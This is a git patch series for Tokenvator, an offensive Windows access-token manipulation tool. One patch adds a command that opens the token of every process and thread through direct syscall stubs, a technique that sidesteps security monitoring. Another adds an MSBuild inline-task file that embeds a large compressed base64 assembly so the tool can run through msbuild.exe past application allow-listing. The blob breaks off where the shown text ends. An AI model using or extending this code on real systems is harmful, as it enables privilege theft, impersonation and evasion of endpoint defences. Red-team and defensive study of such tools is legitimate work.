+            "All", "Command:", "Filter:", "Force", "Groups:", "Impersonation", "Legacy", "Password:", "Path:", "PPID:", "Privilege:", "Process:", "ServiceName:", "State:", "Thread:", "Username:"        
         };
 
 

From 61bf1dcd374259e440d75fbcdbf2daeaeaec5262 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 11:35:21 -0400
Subject: [PATCH 32/36] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index b340f56..6a53295 100644
--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@ https://github.com/0xbadjuju/Tokenvator/wiki
 Building instructions can be found here:<br>
 https://github.com/0xbadjuju/Tokenvator/wiki/Building-Tokenvator
 
-This project now utilizes [MonkeyWorks](https://github.com/NetSPI/MonkeyWorks), to clone issue the following command:<br>
+This project now utilizes [MonkeyWorks](https://github.com/NetSPI/MonkeyWorks) and a modified verson of [DInvoke](https://github.com/0xbadjuju/DInvoke) ([Original](https://github.com/TheWover/DInvoke)). To clone issue the following command:<br>
 **git clone _--recursive_ https://github.com/0xbadjuju/Tokenvator.git**
 
 ### Author, Contributors, and License

From 041017f75b5d70127276546276b798e2ca709707 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 7 Apr 2022 11:35:57 -0400
Subject: [PATCH 33/36] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 6a53295..d44b331 100644
--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@ https://github.com/0xbadjuju/Tokenvator/wiki
 Building instructions can be found here:<br>
 https://github.com/0xbadjuju/Tokenvator/wiki/Building-Tokenvator
 
-This project now utilizes [MonkeyWorks](https://github.com/NetSPI/MonkeyWorks) and a modified verson of [DInvoke](https://github.com/0xbadjuju/DInvoke) ([Original](https://github.com/TheWover/DInvoke)). To clone issue the following command:<br>
+This project now utilizes [MonkeyWorks](https://github.com/NetSPI/MonkeyWorks) and a modified verson of [DInvoke](https://github.com/0xbadjuju/DInvoke) ([Original](https://github.com/TheWover/DInvoke)) via SubModules. To clone issue the following command:<br>
 **git clone _--recursive_ https://github.com/0xbadjuju/Tokenvator.git**
 
 ### Author, Contributors, and License

From 0c1efc004e5b406e286c1eccff2c127a67abca42 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Tue, 12 Apr 2022 12:48:22 -0500
Subject: [PATCH 34/36] List_All_Tokens

Finds all available tokens on the system - suggestion from @mdev
---
 Tokenvator/MainLoop.Modules.cs                | 26 ++++++++
 Tokenvator/MainLoop.cs                        |  4 ++
 .../Plugins/AccessTokens/AccessTokens.cs      | 63 +++++++++++++------
 .../Plugins/AccessTokens/TokenInformation.cs  | 18 ++++--
 4 files changed, 87 insertions(+), 24 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 094b9c7..50b0bc1 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -804,6 +804,32 @@ private void _ListPrivileges()
             }
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        private void _ListAllTokens()
+        {
+            using (TokenInformation ti = new TokenInformation(currentProcessToken))
+            {
+                foreach (var p in Process.GetProcesses())
+                {
+                Console.WriteLine("\n[*] {0,-8} {1}", p.Id, p.ProcessName);
+                
+                    if (!ti.OpenProcessToken(p.Id, false))
+                    {
+                        continue;   
+                    }
+                    ti.SetWorkingTokenToRemote();
+
+                    Console.WriteLine(ti.GetTokenUser(false));
+                    ti.ListThreads(p.Id);
+                    ti.GetThreadUsers(false);
+                }
+            }
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Logs on a user, can be used with virtual service accounts
diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index 7dd0134..bc8c117 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -43,6 +43,7 @@ partial class MainLoop
             {"Sample_Processes_WMI", "-", "-", "Sample_Processes_WMI"},
             {"Find_User_Processes", "-", "User", "Find_User_Processes /User:Administrator"},
             {"Find_User_Processes_WMI", "-", "User", "Find_User_Processes_WMI /User:Administrator"},
+            {"List_All_Tokens", "-", "-", "List_All_Tokens"},
             {"", "", "", ""},
 
             {"List_Filters", "-", "-", "List_Filters"},
@@ -249,6 +250,9 @@ internal void Run()
                     case "list_privileges":
                         _ListPrivileges();
                         break;
+                    case "list_all_tokens":
+                        _ListAllTokens();
+                        break;
                     case "logon_user":
                         _LogonUser();
                         break;
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index eed701d..58dc720 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -35,6 +35,8 @@ class AccessTokens : IDisposable
 
         private IntPtr hNtOpenProcess = IntPtr.Zero;
         private IntPtr hNtOpenProcessToken = IntPtr.Zero;
+        private IntPtr hNtOpenThread = IntPtr.Zero;
+        private IntPtr hNtOpenThreadToken = IntPtr.Zero;
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
@@ -211,6 +213,8 @@ public bool ListThreads(int processId)
                 processId = Process.GetCurrentProcess().Id;
             }
 
+            threads.Clear();
+
             ////////////////////////////////////////////////////////////////////////////////
             // Create a snapshot of all system threads that can be walked through
             // IntPtr hSnapshot = kernel32.CreateToolhelp32Snapshot(TiHelp32.TH32CS_SNAPTHREAD, 0);
@@ -328,8 +332,7 @@ public bool OpenProcessToken(int processId, bool showOutput = true)
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] NtOpenProcess Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "GetSyscallStub - NtOpenProcess");
                 return false;
             }
 
@@ -391,7 +394,11 @@ public bool OpenProcessToken(int processId, bool showOutput = true)
                 ////////////////////////////////////////////////////////////////////////////////
                 // Retry by Opening Token with MAXIMUM_ALLOWED
                 ////////////////////////////////////////////////////////////////////////////////
-                Console.WriteLine(" [*] TOKEN_ALL_ACCESS Failed, Retrying with {0}", Winnt.ACCESS_MASK.MAXIMUM_ALLOWED);
+                if (showOutput)
+                {
+                    Console.WriteLine(" [*] TOKEN_ALL_ACCESS Failed, Retrying with {0}", Winnt.ACCESS_MASK.MAXIMUM_ALLOWED);
+                }
+
                 try
                 {
                     ntRetVal = fSyscallNtOpenProcessToken(hProcess, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, ref hExistingToken);
@@ -435,14 +442,24 @@ public bool OpenProcessToken(int processId, bool showOutput = true)
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
-        public bool OpenThreadToken(uint threadId, uint permissions)
+        public bool OpenThreadToken(uint threadId, uint permissions, bool showOutput = true)
         {
             ////////////////////////////////////////////////////////////////////////////////
             // Open a limited handle to the thread via a syscall stub
             // IntPtr hThread = kernel32.OpenThread(ProcessThreadsApi.ThreadSecurityRights.THREAD_QUERY_INFORMATION, false, threadId);
             ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hNtOpenThread = Generic.GetSyscallStub("NtOpenThread");
+            if (IntPtr.Zero == hNtOpenThread)
+            {
+                try
+                {
+                    hNtOpenThread = Generic.GetSyscallStub("NtOpenThread");
+                }
+                catch (Exception ex)
+                {
+                    Misc.GetExceptionMessage(ex, "GetSyscallStub - NtOpenThread");
+                    return false;
+                }
+            }
             var fSyscallNtOpenThread = (MonkeyWorks.ntdll.NtOpenThread)Marshal.GetDelegateForFunctionPointer(hNtOpenThread, typeof(MonkeyWorks.ntdll.NtOpenThread));
 
             IntPtr hThread = new IntPtr();
@@ -460,12 +477,11 @@ public bool OpenThreadToken(uint threadId, uint permissions)
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] NtOpenThread Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "NtOpenThread");
                 return false;
             }
 
-            if (0 != ntRetVal)
+            if (0 != ntRetVal && showOutput)
             {
                 Misc.GetNtError("NtOpenThread", ntRetVal);
                 return false;
@@ -476,8 +492,18 @@ public bool OpenThreadToken(uint threadId, uint permissions)
             // Open a handle to the thread token
             // bool retVal = kernel32.OpenThreadToken(hThread, permissions, false, ref hWorkingThreadToken);
             ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hNtOpenThreadToken = Generic.GetSyscallStub("NtOpenThreadToken");
+            if (IntPtr.Zero == hNtOpenThreadToken)
+            {
+                try
+                {
+                    hNtOpenThreadToken = Generic.GetSyscallStub("NtOpenThreadToken");
+                }
+                catch (Exception ex)
+                {
+                    Misc.GetExceptionMessage(ex, "GetSyscallStub - NtOpenThreadToken");
+                    return false;
+                }
+            }
             var fSyscallNtOpenThreadToken = (MonkeyWorks.ntdll.NtOpenThreadToken)Marshal.GetDelegateForFunctionPointer(hNtOpenThreadToken, typeof(MonkeyWorks.ntdll.NtOpenThreadToken));
 
             try
@@ -486,8 +512,7 @@ public bool OpenThreadToken(uint threadId, uint permissions)
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] NtOpenThreadToken Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "NtOpenThreadToken");
                 return false;
             }
             finally
@@ -500,15 +525,17 @@ public bool OpenThreadToken(uint threadId, uint permissions)
             if (0 != ntRetVal)
             {
                 //Skip error message if no token exists
-                if (3221225596 != ntRetVal)
+                if (3221225596 != ntRetVal && showOutput)
                 {
-                    Console.WriteLine(" [-] Unable to Open Process Token");
-                    Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+                    Console.WriteLine(" [-] Unable to Open Thread Token");
+                    Misc.GetNtError("NtOpenThreadToken", ntRetVal);
                 }
                 return false;
             }
-
-            Console.WriteLine("[*] Recieved Token Handle 0x{0}", hWorkingThreadToken.ToString("X4"));
+            if (showOutput)
+            { 
+                Console.WriteLine("[*] Recieved Token Handle 0x{0}", hWorkingThreadToken.ToString("X4"));
+            }
             return true;
         }
 
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index d67d061..b289ba3 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -128,17 +128,23 @@ public override void Dispose()
         /// No Conversions Required 
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        public void GetThreadUsers()
+        public void GetThreadUsers(bool showOutput = true)
         {
             foreach (uint t in threads)
             {
-                Console.WriteLine("[*] Thread ID: " + t);
-                if (OpenThreadToken(t, Winnt.TOKEN_QUERY))
+                if (showOutput)
                 {
-                    using (TokenInformation ti = new TokenInformation(hWorkingThreadToken))
+                    Console.WriteLine("[*] Thread ID: " + t);
+                }
+
+                if (OpenThreadToken(t, Winnt.TOKEN_QUERY, showOutput))
+                {
+                    SetWorkingTokenToThreadToken();
+                    string user = GetTokenUser(showOutput);
+
+                    if (!showOutput)
                     {
-                        ti.SetWorkingTokenToSelf();
-                        ti.GetTokenUser();
+                        Console.WriteLine("[*] Thread: {0} - {1}", t, user);
                     }
                 }
             }

From 209337feeaf4d1cd8e54761267815484fcf5315f Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 2 Jun 2022 08:38:26 -0500
Subject: [PATCH 35/36] Adding msbuild option

---
 Tokenvator/Tokenvator.xml | 56 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 Tokenvator/Tokenvator.xml

diff --git a/Tokenvator/Tokenvator.xml b/Tokenvator/Tokenvator.xml
new file mode 100644
index 0000000..269bead
--- /dev/null
+++ b/Tokenvator/Tokenvator.xml
@@ -0,0 +1,56 @@
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+   <Target Name="TokenEffort">
+     <TokenEffort />
+  </Target>
+  <UsingTask
+      TaskName="TokenEffort"
+      TaskFactory="CodeTaskFactory"
+      AssemblyFile="C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+    <ParameterGroup/>
+    <Task>
+      <Code Type="Class" Language="cs">
+        <![CDATA[
+                using System;
+                using System.IO;
+                using System.Reflection;
+                using System.IO.Compression;
+                using Microsoft.Build.Framework;
+                using Microsoft.Build.Utilities;
+
+                public class TokenEffort :  Task, ITask
+                {
+                    public override bool Execute()
+                    {
+                        // interactive
+                        string[] args = new string[] { };      
+                        
+                        // command line
+                        // string[] args = new string[] { "whoami" };  
+                        string strCompressedBin = "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